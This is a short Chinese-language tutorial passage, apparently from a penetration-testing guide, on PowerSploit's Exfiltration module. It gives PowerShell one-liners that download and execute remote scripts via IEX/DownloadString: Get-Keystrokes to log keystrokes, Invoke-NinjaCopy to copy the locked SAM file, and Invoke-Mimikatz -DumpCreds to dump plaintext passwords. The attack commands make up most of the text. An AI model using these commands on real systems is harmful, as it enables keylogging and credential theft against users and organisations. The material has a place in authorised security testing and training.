Exfiltration模块

 

a) 调用Get-Keystrokes记录用户的键盘输入。

1）通过IEX下载并调用Get-Keystrokes。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

PS C:\Users\Administrator> Get-Keystrokes -LogPath c:\users\administrator\desktop\1.txt

 

 

b) 调用Invoke-NinjaCopy复制一些系统无法复制的文件如sam文件。

1）通过IEX下载并调用Get-NinjaCopy。

正常情况下复制：

 

通过Invoke-NinjaCopy进行复制：

PS C:\Users\Administrator> Invoke-NinjaCopy -Path c:\windows\system32\config\SAM -LocalDestination c:\users\administrator\desktop\1.sam

 

 

注意：这个脚本是要有管理员权限下才可以正常执行，否则会报错，毕竟是要拷贝系统文件，只是它做了管理员做不了的事。

 

 

 

 

c) 调用Invoke-Mimikatz（内网神器）抓取内存中的明文密码。

1）通过IEX下载并调用Invoke-Mimikatz。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

PS C:\Users\Administrator> Invoke-Mimikatz -DumpCreds

注意：这个脚本是要有管理员权限下才可以正常执行，否则会报错，毕竟涉及到密码之类的敏感信息，哪怕是管理员想看到明文的，也是很难实现的。